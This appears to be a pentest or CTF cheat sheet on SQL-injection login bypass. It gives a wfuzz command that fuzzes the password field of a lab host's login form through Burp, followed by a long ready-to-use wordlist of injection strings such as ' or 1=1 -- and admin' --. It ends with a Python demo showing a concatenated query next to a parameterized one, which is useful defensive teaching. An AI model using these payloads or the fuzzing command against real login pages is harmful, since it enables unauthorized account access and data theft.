Authentication bypass

Authentication bypass with SQL

Send every request through Burp Suite with the -p (proxy) option; FUZZ marks the password field as the fuzzed position:
wfuzz -c -z file,sqlibypass.txt -d "__csrf_magic=sid%3Aa839ec5433fa491b740a65d8466329fe409d20b0%2C1569615456&usernamefld=admin&passwordfld=FUZZ&login=Login" -u http://10.10.10.60/index.php -p 127.0.0.1:8080 -L
Payloads available on:
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Wordlist to use with Burp Suite Intruder:
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 --
'*'
') OR 1=1 LIMIT 1 #
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1#;
wronguser' or 1=1 LIMIT 1;#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or '1'='1
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
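Why strings like the ones above get past a login form, and what stops them, as an added example that is not part of the original page: a login query built by string concatenation next to the same query with bound parameters, run against an in-memory SQLite database. The table, credentials and function names are constructed for illustration, the password field is the fuzzed position as in the wfuzz command, and only list entries that are valid in SQLite's dialect are used.

```python
import sqlite3

# Constructed sample data; the password is stored in plaintext only to keep the demo short.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable: user input is spliced into the SQL text and parsed as SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error:
        return None  # the input broke the statement's syntax
    return row[0] if row else None

def login_parameterized(db, username, password):
    """Hardened: values are bound as data and never reach the SQL parser."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# (username, password) pairs; the injected strings are taken from the list above.
ATTEMPTS = [
    ("admin", "constructed-secret"),  # legitimate login
    ("admin", "wrong-password"),      # ordinary failure
    ("admin", "' or 1=1 --"),         # OR clause makes the WHERE always true
    ("admin", "' or 'x'='x"),         # closes the quote, reuses the trailing one
    ("admin", "' OR '' = '"),
    ("admin' --", "anything"),        # comment removes the password check
]

def compare():
    """Return (username, password, concatenated_result, parameterized_result) rows."""
    db = make_db()
    return [(u, p, login_concatenated(db, u, p), login_parameterized(db, u, p))
            for u, p in ATTEMPTS]

if __name__ == "__main__":
    for u, p, vulnerable, hardened in compare():
        print(f"user={u!r:12} pass={p!r:22} "
              f"concatenated={vulnerable!r:8} parameterized={hardened!r}")
```

Binding parameters removes the injection only; a production login would also compare against a salted password hash rather than a stored plaintext value.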
